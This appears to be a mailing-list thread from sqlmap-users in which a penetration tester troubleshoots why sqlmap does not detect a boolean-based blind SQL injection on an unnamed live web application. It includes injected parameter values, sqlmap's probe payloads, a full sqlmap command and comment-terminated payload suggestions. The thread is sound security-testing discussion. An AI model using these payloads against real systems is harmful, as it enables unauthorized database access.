The injections I see like those are all suffixed with the start of a
comment (# or --). So, technically it should matter if single quotes are
used in the latter part of the boolean clause.
For instance, SELECT * FROM blah WHERE foo = 'fdsa' with value 'fdsa' being
injectable. Using fdsa' AND 1=1# would result with the trailing single
quote being part of the comment and ignored by MySQL.
Can you exploit the injection by hand using 1=1# or 1=1--?
On Tue, Apr 28, 2015 at 8:15 AM, Alistair Johnson <amcljohn...@gmail.com>
wrote:
> Hi Brandon,
>
> Thanks for your comment. Confirming that i've tried risk=3 with
> level=5 with the same results. I've looked more closely at the
> requests that sqlmap is sending to check if the parameter is
> injectable. It is testing the Sec paramater with values such as:
>
> PackageSelection) AND 1477=7114
> PackageSelection) AND 1631=1631
> PackageSelection') AND 5603=7729
> PackageSelection') AND 1631=1631
> PackageSelection' AND 3943=9381
> PackageSelection' AND 1631=1631
> PackageSelection" AND 3324=4690
> PackageSelection" AND 1631=1631
> PackageSelection) AND 4734=6616 AND (6346=6346
> PackageSelection)) AND 7350=9272 AND (8861=8861
>
> When in fact, i assume it would need to use logic like I used to get
> distinguishable responses:
>
> PackageSelection (returns response A)
> PackageSelection' AND '1'='1 (returns response A)
> PackageSelection' AND '1'='2 (returns response B)
>
> In a nutshell, it doesn't appear to be trying single quotes and values
> in the ' AND '1'='1 pattern. But i would have thought this is a pretty
> typical format for checking boolean-based blind SQLi.
>
> Cheers,
>
> Alistair.
>
> On Tue, Apr 28, 2015 at 10:36 PM, Brandon Perry
> <bperry.volat...@gmail.com> wrote:
> > It's a GET, so there wouldn't be a content type, unless I am mistaken.
> >
> > Alistair, have you tried --risk=3 with --level=5 yet?
> >
> > Sent from a phone
> >
> > On Apr 28, 2015, at 7:13 AM, Miroslav Stampar <
> miroslav.stam...@gmail.com>
> > wrote:
> >
> > Can you please send the unredacted content of request.txt to my address?
> >
> > If not, then please at least send me the content of traffic file which
> you
> > can obtain by just appending the "-t traffic.txt" to the regular sqlmap's
> > run.
> >
> > Bye
> >
> > On Tue, Apr 28, 2015 at 2:10 PM, Alistair Johnson <amcljohn...@gmail.com
> >
> > wrote:
> >>
> >> Thanks for the quick reply.
> >>
> >> The contents of the request file are as follows:
> >>
> >> GET /help/UserGuide.aspx?Sec=PackageSelection HTTP/1.1
> >> Host: <redacted>
> >> Accept: */*
> >> Accept-Language: en
> >> User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64;
> >> x64; Trident/5.0)
> >> Connection: close
> >> Referer: <redacted>
> >> Cookie: <redacted>
> >>
> >> I've redacted some of the details as it's not appropriate to draw
> >> attention to an internet facing application's SQLi vulnerability.
> >>
> >> When providing the request file as part of the following command:
> >> sqlmap -r '<request file>' -p 'Sec' --dbms 'Microsoft SQL Server'
> >> --level=4 --proxy=http://127.0.0.1:8080 --technique=B --string
> >> 'industries' -v 1
> >>
> >> sqlmap executes as normal but cannot identify (and therefore cannot
> >> exploit) the boolean-based blind vulnerability which I've verified
> >> manually.
> >>
> >> Thanks again,
> >>
> >> Al.
> >>
> >>
> >> On Tue, Apr 28, 2015 at 9:59 PM, Miroslav Stampar
> >> <miroslav.stam...@gmail.com> wrote:
> >> > And what is the content of request file?
> >> >
> >> > Bye
> >> >
> >> > On Tue, Apr 28, 2015 at 1:03 PM, Alistair Johnson
> >> > <amcljohn...@gmail.com>
> >> > wrote:
> >> >>
> >> >> Hi sqlmappers,
> >> >>
> >> >> I'm a fairly experienced user of sqlmap having used it extensively in
> >> >> the past. I came across what appeared to pretty typical boolean-based
> >> >> blind SQLi in an application I'm (legally) testing. However, for the
> >> >> first time, I'm unable to get sqlmap to recognise the parameter as
> >> >> vulnerable to exploit it further. And as we know, manually exploiting
> >> >> blind SQLi is cumbersome to say the least.
> >> >>
> >> >> Here is a summary of the requests i've made to manually confirm the
> >> >> vulnerability.
> >> >>
> >> >> /help/UserGuide.aspx?Sec=PackageSelection (returns response A)
> >> >> /help/UserGuide.aspx?Sec=PackageSelection'+and+'1'='1 (returns
> response
> >> >> A)
> >> >> /help/UserGuide.aspx?Sec=PackageSelection'+and+'1'='2 (returns
> response
> >> >> B)
> >> >>
> >> >> I've tried various sqlmap flags and thought the following command
> >> >> would give me the best chance of success:
> >> >>
> >> >> sqlmap -r '<request file>' -p 'Sec' --dbms 'Microsoft SQL Server'
> >> >> --level=4 --proxy=http://127.0.0.1:8080 --technique=B --string
> >> >> 'industries' -v 1
> >> >>
> >> >> Note: the string 'industries' is text that appears in response A but
> >> >> not response B.
> >> >>
> >> >> I've looked at the requests that sqlmap is sending in the background
> >> >> (proxied through burp). It appears that it's attempting to exploit
> >> >> this with the AND statement as it should but is not using single
> >> >> quotes as per my example above.
> >> >>
> >> >> I'd appreciate any insight. If this is a shortcoming in sqlmap, i'd
> be
> >> >> more than happy to contribute some time to improve it so it can
> >> >> identify injectable parameters such as these in the future.
> >> >>
> >> >> Thanks,
> >> >>
> >> >> Al.
> >> >>
> >> >>
> >> >>
> >> >>
> ------------------------------------------------------------------------------
> >> >> One dashboard for servers and applications across
> >> >> Physical-Virtual-Cloud
> >> >> Widest out-of-the-box monitoring support with 50+ applications
> >> >> Performance metrics, stats and reports that give you Actionable
> >> >> Insights
> >> >> Deep dive visibility with transaction tracing using APM Insight.
> >> >> http://ad.doubleclick.net/ddm/clk/290420510;117567292;y
> >> >> _______________________________________________
> >> >> sqlmap-users mailing list
> >> >> sqlmap-users@lists.sourceforge.net
> >> >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
> >> >
> >> >
> >> >
> >> >
> >> > --
> >> > Miroslav Stampar
> >> > http://about.me/stamparm
> >
> >
> >
> >
> > --
> > Miroslav Stampar
> > http://about.me/stamparm
> >
> >
> ------------------------------------------------------------------------------
> > One dashboard for servers and applications across Physical-Virtual-Cloud
> > Widest out-of-the-box monitoring support with 50+ applications
> > Performance metrics, stats and reports that give you Actionable Insights
> > Deep dive visibility with transaction tracing using APM Insight.
> > http://ad.doubleclick.net/ddm/clk/290420510;117567292;y
> >
> > _______________________________________________
> > sqlmap-users mailing list
> > sqlmap-users@lists.sourceforge.net
> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
--
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website
------------------------------------------------------------------------------
One dashboard for servers and applications across Physical-Virtual-Cloud
Widest out-of-the-box monitoring support with 50+ applications
Performance metrics, stats and reports that give you Actionable Insights
Deep dive visibility with transaction tracing using APM Insight.
http://ad.doubleclick.net/ddm/clk/290420510;117567292;y
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
